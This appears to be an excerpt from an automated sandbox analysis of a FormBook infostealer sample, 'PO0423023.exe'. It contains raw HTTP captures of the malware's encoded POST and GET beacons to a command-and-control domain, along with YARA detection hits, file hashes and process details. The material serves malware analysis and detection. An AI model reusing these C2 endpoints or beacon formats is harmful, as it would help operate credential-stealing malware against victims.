66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49731	91.195.240.117	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:23.855096102 CEST	1681	OUT	POST /pq0o/ HTTP/1.1 Host: www.fashionagencylab.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.fashionagencylab.com Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.fashionagencylab.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 4a 66 58 6b 49 68 31 70 2b 77 43 73 59 45 4f 41 30 41 76 56 30 49 49 30 4b 6b 62 33 68 65 46 49 6c 6a 6c 45 43 47 6b 66 66 54 7a 59 64 61 63 71 72 34 50 47 32 7a 41 43 2b 68 39 4a 6e 2b 6d 68 57 41 63 55 2f 49 4f 4e 68 41 53 5a 52 64 65 77 4b 2b 78 57 37 33 44 41 72 2b 6c 76 61 55 34 67 78 39 47 51 4c 31 34 4e 4d 33 2f 70 58 36 47 73 67 71 54 39 66 4b 34 2b 38 30 68 6d 49 42 78 6e 57 71 48 38 75 50 59 77 6c 67 39 35 69 4b 42 70 4f 4a 47 62 66 75 54 6a 70 52 74 53 30 75 49 2b 43 79 53 5a 67 75 36 39 74 42 4a 59 45 7a 71 35 6e 4c 58 45 41 6b 78 49 55 68 32 65 6f 30 6b 64 76 73 70 38 56 51 30 7a 4a 49 49 69 50 76 49 62 49 34 4d 39 37 7a 42 64 6f 32 30 46 70 6a 64 34 59 6c 47 4e 39 77 58 7a 58 31 61 58 45 53 2f 32 70 33 5a 35 37 2b 30 7a 4a 36 74 59 67 45 77 31 5a 41 4f 4f 6f 77 36 4e 6d 39 49 51 73 78 61 46 62 4b 78 7a 30 5a 61 50 71 47 6a 31 54 4a 55 32 6e 4e 52 76 44 5a 54 55 48 69 54 79 64 4e 4f 32 4a 4d 57 4c 4e 67 43 74 52 41 64 6a 30 78 51 36 31 4e 78 70 79 79 43 71 4e 58 69 58 35 77 53 7a 54 50 31 70 6f 2b 6c 78 48 4e 35 43 5a 59 66 74 7a 74 49 6f 6a 6c 67 37 4e 74 56 4e 6d 53 42 7a 46 76 74 67 6f 69 4e 4f 43 77 39 68 31 72 56 67 77 34 74 30 35 4a 74 41 72 67 70 51 6b 6f 69 66 4b 74 4f 4c 46 66 37 2f 30 78 62 6d 6d 53 48 62 39 34 6b 58 72 44 62 57 49 4c 41 77 6e 50 73 4e 76 36 74 2b 41 43 76 42 4f 66 68 50 46 6f 36 6b 30 66 6d 43 62 32 66 49 46 6c 79 39 69 7a 4b 44 36 34 59 6f 77 76 68 78 33 57 43 6d 55 67 7a 6f 5a 68 36 69 72 71 47 7a 4c 31 70 4a 6e 2b 49 4c 77 74 61 49 36 4d 31 46 2f 74 73 65 55 69 59 41 59 36 6e 54 6a 61 51 31 59 73 48 42 6b 38 31 57 35 43 71 65 6f 58 2b 33 51 52 43 48 56 43 6f 7a 65 76 6d 72 64 39 31 75 62 66 62 30 6a 69 70 55 30 6a 4e 59 49 52 56 6e 41 55 64 73 66 56 52 57 77 6b 44 42 67 6a 67 55 50 66 65 47 2f 44 73 6b 46 64 79 77 5a 33 65 35 44 42 32 63 47 6c 6e 66 5a 32 51 32 51 48 4f 6f 73 76 61 62 76 6e 37 56 48 42 55 5a 6f 62 46 51 4a 55 6b 42 74 6f 5a 5a 6b 5a 5a 70 73 6f 71 44 53 65 74 45 6d 4a 2b 7a 6a 37 49 66 5a 33 72 74 50 39 38 52 6a 55 6b 57 4c 69 6a 32 57 43 68 70 70 46 59 6a 6b 69 64 36 5a 46 53 79 46 76 4e 73 53 44 70 69 6c 4a 4d 55 48 35 63 61 48 75 73 38 37 42 30 65 6f 51 72 59 53 2b 56 31 66 6f 44 70 70 5a 50 64 41 6f 4f 42 71 41 5a 78 4a 31 44 4a 62 55 53 66 5a 6e 51 56 44 36 30 43 4e 4a 65 72 4a 32 59 53 7a 39 57 7a 6b 5a 79 4d 2f 42 70 75 4c 42 68 37 2b 77 54 37 4d 46 39 4b 51 4b 59 72 53 50 38 76 4e 66 48 52 79 73 4a 69 2b 47 4d 53 31 48 70 6a 61 71 6f 48 58 38 62 6b 51 4f 2f 78 52 5a 33 4d 4c 31 6b 59 61 48 32 7a 47 6a 6c 6d 6e 4d 4b 4b 79 7a 38 71 69 6c 72 2b 47 61 57 75 52 67 47 61 48 7a 49 6d 2b 6d 67 6d 49 75 32 73 70 50 52 65 4d 6e 4a 4c 43 4e 4e 38 4b 32 4d 63 64 52 44 52 75 5a 6f 50 51 4e 73 30 47 75 52 53 70 6e 4e 41 57 62 6d 33 41 6d 6f 54 35 44 34 48 78 75 63 42 46 31 48 67 32 71 38 44 33 63 54 43 77 57 77 4c 2f 42 51 72 58 48 30 68 59 2b 70 56 66 76 6b 46 4f 47 73 35 6a 31 75 6d 66 73 38 49 35 6f 59 57 2f 6e 55 45 34 44 75 6c 33 70 4e 6c 57 30 4f 56 59 78 38 31 76 49 65 31 6f 52 44 46 50 36 30 4f 70 64 71 75 4f 49 52 77 33 41 4f 4e 45 58 4e 4c 71 38 6a 37 31 65 52 42 53 61 5a 65 39 6d 4a 66 4e 66 4a 6b 5a 63 4a 34 4f 78 71 57 6e 4f 67 66 52 6c 77 49 51 68 78 78 73 35 36 76 66 6c 4c 6b 77 6f 53 46 76 4b 58 58 71 75 59 39 61 43 43 7a 75 41 6d 39 2b 33 5a 4c 35 4c 6f 2b 6d 65 48 2f 79 59 2f 44 62 45 5a 6c 6b 64 51 4e 75 52 2b 51 4f 36 46 71 53 48 43 35 33 30 2b 4c 67 5a 67 44 6d 34 51 54 74 76 43 30 30 59 53 4d 75 32 51 47 68 62 6f 35 53 59 65 33 4d 65 79 63 33 74 43 71 42 79 49 4b 44 42 39 54 4d 76 61 58 32 62 53 41 46 53 6e 78 78 4a 30 70 73 52 2f 78 42 6b 35 38 59 2b 57 61 49 58 53 39 74 2b 73 50 70 78 65 66 34 50 4e 4c 59 74 34 30 38 34 65 65 42 4a 77 64 39 67 45 41 33 41 3d 3d Data Ascii: sHlxgpX=JfXkIh1p+wCsYEOA0AvV0II0Kkb3heFIljlECGkffTzYdacqr4PG2zAC+h9Jn+mhWAcU/IONhASZRdewK+xW73DAr+lvaU4gx9GQL14NM3/pX6GsgqT9fK4+80hmIBxnWqH8uPYwlg95iKBpOJGbfuTjpRtS0uI+CySZgu69tBJYEzq5nLXEAkxIUh2eo0kdvsp8VQ0zJIIiPvIbI4M97zBdo20Fpjd4YlGN9wXzX1aXES/2p3Z57+0zJ6tYgEw1ZAOOow6Nm9IQsxaFbKxz0ZaPqGj1TJU2nNRvDZTUHiTydNO2JMWLNgCtRAdj0xQ61NxpyyCqNXiX5wSzTP1po+lxHN5CZYftztIojlg7NtVNmSBzFvtgoiNOCw9h1rVgw4t05JtArgpQkoifKtOLFf7/0xbmmSHb94kXrDbWILAwnPsNv6t+ACvBOfhPFo6k0fmCb2fIFly9izKD64Yowvhx3WCmUgzoZh6irqGzL1pJn+ILwtaI6M1F/tseUiYAY6nTjaQ1YsHBk81W5CqeoX+3QRCHVCozevmrd91ubfb0jipU0jNYIRVnAUdsfVRWwkDBgjgUPfeG/DskFdywZ3e5DB2cGlnfZ2Q2QHOosvabvn7VHBUZobFQJUkBtoZZkZZpsoqDSetEmJ+zj7IfZ3rtP98RjUkWLij2WChppFYjkid6ZFSyFvNsSDpilJMUH5caHus87B0eoQrYS+V1foDppZPdAoOBqAZxJ1DJbUSfZnQVD60CNJerJ2YSz9WzkZyM/BpuLBh7+wT7MF9KQKYrSP8vNfHRysJi+GMS1HpjaqoHX8bkQO/xRZ3ML1kYaH2zGjlmnMKKyz8qilr+GaWuRgGaHzIm+mgmIu2spPReMnJLCNN8K2McdRDRuZoPQNs0GuRSpnNAWbm3AmoT5D4HxucBF1Hg2q8D3cTCwWwL/BQrXH0hY+pVfvkFOGs5j1umfs8I5oYW/nUE4Dul3pNlW0OVYx81vIe1oRDFP60OpdquOIRw3AONEXNLq8j71eRBSaZe9mJfNfJkZcJ4OxqWnOgfRlwIQhxxs56vflLkwoSFvKXXquY9aCCzuAm9+3ZL5Lo+meH/yY/DbEZlkdQNuR+QO6FqSHC530+LgZgDm4QTtvC00YSMu2QGhbo5SYe3Meyc3tCqByIKDB9TMvaX2bSAFSnxxJ0psR/xBk58Y+WaIXS9t+sPpxef4PNLYt4084eeBJwd9gEA3A==
Apr 23, 2024 08:39:24.031277895 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:39:23 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49732	91.195.240.117	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:27.013578892 CEST	374	OUT	GET /pq0o/?sHlxgpX=Ed/ELXNC0S7dMHCut27L778qDXjqsr17l3BGGyc+QR+QSIsAiYGE9ikEmCd6tM+iTSJXxriNtRC8Y/iBHpE37xqgjcRlXnwEl/GWP1Z5DHGRU92yhpKCU6gPuWpCXnwQNw==&Lx=8PqlJ028VT_ HTTP/1.1 Host: www.fashionagencylab.com Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 23, 2024 08:39:27.548019886 CEST	1289	IN	HTTP/1.1 200 OK date: Tue, 23 Apr 2024 06:39:27 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_l//4DOWpIDOahJruVe1dpC9nc99RfZ7ZmAGsHfAuz91rS389GP8QyUDRuPgx374wqFF2bVIa77mqtffOSAsibA== last-modified: Tue, 23 Apr 2024 06:39:27 GMT x-cache-miss-from: parking-55fd589654-j5pqn server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6c 2f 2f 34 44 4f 57 70 49 44 4f 61 68 4a 72 75 56 65 31 64 70 43 39 6e 63 39 39 52 66 5a 37 5a 6d 41 47 73 48 66 41 75 7a 39 31 72 53 33 38 39 47 50 38 51 79 55 44 52 75 50 67 78 33 37 34 77 71 46 46 32 62 56 49 61 37 37 6d 71 74 66 66 4f 53 41 73 69 62 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 66 61 73 68 69 6f 6e 61 67 65 6e 63 79 6c 61 62 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 66 61 73 68 69 6f 6e 61 67 65 6e 63 79 6c 61 62 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 73 68 69 6f 6e 61 67 65 6e 63 79 6c 61 62 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_l//4DOWpIDOahJruVe1dpC9nc99RfZ7ZmAGsHfAuz91rS389GP8QyUDRuPgx374wqFF2bVIa77mqtffOSAsibA==><head><meta charset="utf-8"><title>fashionagencylab.com - fashionagencylab Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="fashionagencylab.com is your first and best source for all of the information youre lookin
Apr 23, 2024 08:39:27.548062086 CEST	1289	IN	Data Raw: 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 66 61 73 68 69 6f 6e 61 Data Ascii: g for. From general topics to more of what you would expect to find here, fashionagencylab.com has it a576ll. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.c
Apr 23, 2024 08:39:27.548077106 CEST	1289	IN	Data Raw: 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 61 75 64 69 6f 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a Data Ascii: ive;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,selec576t,textarea{font-f
Apr 23, 2024 08:39:27.548108101 CEST	1289	IN	Data Raw: 6f 61 64 2d 62 75 74 74 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 Data Ascii: oad-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#313131;text-align:center;padding:0 5px}.an
Apr 23, 2024 08:39:27.548121929 CEST	453	IN	Data Raw: 20 30 20 35 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 Data Ascii: 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-a
Apr 23, 2024 08:39:27.548156977 CEST	1289	IN	Data Raw: 32 30 43 34 0d 0a 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 Data Ascii: 20C4two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-elemen
Apr 23, 2024 08:39:27.548171043 CEST	1289	IN	Data Raw: 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e Data Ascii: container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0 none}.container-searchbox__butt
Apr 23, 2024 08:39:27.548227072 CEST	1289	IN	Data Raw: 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b Data Ascii: __content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-heade
Apr 23, 2024 08:39:27.548263073 CEST	1289	IN	Data Raw: 64 65 78 3a 2d 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 Data Ascii: dex:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;fo
Apr 23, 2024 08:39:27.548317909 CEST	1289	IN	Data Raw: 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 Data Ascii: #fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}
Apr 23, 2024 08:39:27.723423958 CEST	1289	IN	Data Raw: 73 6c 73 68 22 3a 66 61 6c 73 65 2c 22 70 70 73 68 22 3a 74 72 75 65 2c 22 64 6e 68 6c 73 68 22 3a 74 72 75 65 2c 22 74 6f 53 65 6c 6c 55 72 6c 22 3a 22 22 2c 22 74 6f 53 65 6c 6c 54 65 78 74 22 3a 22 22 2c 22 73 65 61 72 63 68 62 6f 78 50 61 74 Data Ascii: slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searchboxPath":"//www.fashionagencylab.com/parking.php","searchParams":{"ses":"Y3JlPTE3MTM4NTQzNjcmdGNpZD13d3cuZmFzaGlvbmFnZW5jeWxhYi5jb202NjI3NTc5ZjVkNzQ4NC42MDY5MzU3NiZ0YX

Target ID:	0
Start time:	08:37:23
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\PO0423023.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO0423023.exe"
Imagebase:	0x120000
File size:	705'032 bytes
MD5 hash:	C7BEBFD0AF94C40DA20CE3639251C688
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:37:25
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\PO0423023.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO0423023.exe"
Imagebase:	0xed0000
File size:	705'032 bytes
MD5 hash:	C7BEBFD0AF94C40DA20CE3639251C688
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:38:03
Start date:	23/04/2024
Path:	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe"
Imagebase:	0x90000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:38:05
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\takeown.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\takeown.exe"
Imagebase:	0x860000
File size:	51'712 bytes
MD5 hash:	A9AB2877AE82A53F5A387B045BF326A4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
